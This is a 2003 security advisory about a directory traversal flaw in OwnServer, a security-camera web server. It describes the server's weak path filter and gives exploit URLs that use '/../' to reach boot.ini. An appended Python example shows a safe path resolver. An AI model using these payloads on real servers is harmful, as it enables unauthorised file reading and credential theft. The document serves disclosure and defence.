OwnServer10.txt

Date: 21 Jan 2004 00:00:00 | Reported by: Rafel Ivgi | Type: packetstorm | Source: packetstormsecurity.com

OwnServer has a high-risk directory traversal vulnerability allowing remote file access.

`#######################################################################  
  
Application: OwnServer (Used By Security Cameras Products)  
Vendors: http://www.anteco.co.il  
Big Resellers:  
http://www.anykeeper.com  
http://www.sahar-systems.co.il  
  
Versions: <= 1.0  
Platforms: Windows  
Bug: Directory Traversal Vulnerability  
Risk: High  
Exploitation: Remote with browser  
Date: 25 Dec 2003  
Author: Rafel Ivgi, The-Insider  
e-mail: [email protected]  
web: http://theinsider.deep-ice.com  
  
#######################################################################  
  
1) Introduction  
2) Bug  
3) The Code  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
OwnServer is a web server used for watching security cameras remotely.  
It allows broadcasting live streaming video on the web through the built-in  
web server.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
The webserver uses a protection to avoid the directory traversal bug.  
"//" is replaced with ""  
"\." and "\.." are replaced with ""  
"\" is replaced with "/"  
"\\" is replaced with "//"  
  
The webserver uses no protection to avoid the directory traversal bug.  
The problem happens when the attacker uses the classic pattern "/../", which  
allows him to see and download any file on the remote system if he knows the  
path.  
This allows any attacker to read and download any local file and, in most  
cases, retrieve the machine's password files and invade it (using  
ssh, ftp, http, netbios, samba, etc.).  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
http://<host>/../../boot.ini  
http://<host>/../../../boot.ini  
http://<host>/../../../../boot.ini  
http://<host>/../../../../../boot.ini  
http://<host>/../../../../../../boot.ini  
  
#######################################################################  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Things that are unlikeable, are NOT impossible."  
`
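
An added example (not part of the advisory and not the vendor's code): a Python model of the replacement rules listed in section 2, showing that they leave the "/../" pattern untouched, beside a resolver that canonicalizes the path and then checks it stays under the document root. The rule order, the function names and the document root `/srv/www` are assumptions, and POSIX-style paths are used so the check is deterministic.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

DOC_ROOT = "/srv/www"  # constructed document root, not from the advisory

# Replacement rules as listed in section 2 of the advisory.
# Applying them in the listed order is an assumption.
ADVISORY_RULES = [("//", ""), ("\\.", ""), ("\\..", ""), ("\\", "/"), ("\\\\", "//")]


def advisory_filter(url_path: str) -> str:
    """Model of the described string-replacement protection."""
    for old, new in ADVISORY_RULES:
        url_path = url_path.replace(old, new)
    return url_path


def naive_resolve(doc_root: str, url_path: str) -> str:
    """Filter, then join to the document root with no containment check."""
    return posixpath.normpath(doc_root + "/" + advisory_filter(url_path))


def safe_resolve(doc_root: str, url_path: str) -> Optional[str]:
    """Decode, canonicalize, then require the result to stay under doc_root."""
    decoded = unquote(url_path).replace("\\", "/")
    if "\x00" in decoded:
        return None
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    # A real server would also resolve symlinks (os.path.realpath) before this check.
    return candidate


if __name__ == "__main__":
    samples = ["/cam/live.html", "/../../boot.ini", "/..%2f..%2fboot.ini", "/..\\..\\boot.ini"]
    for p in samples:
        print(repr(p), "->", naive_resolve(DOC_ROOT, p), "|", safe_resolve(DOC_ROOT, p))
```

The filter fails because it rewrites substrings instead of deciding where the final path points; the containment check makes that decision after all decoding and normalization is done.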

Vulners AI Score: 7.4 (High risk)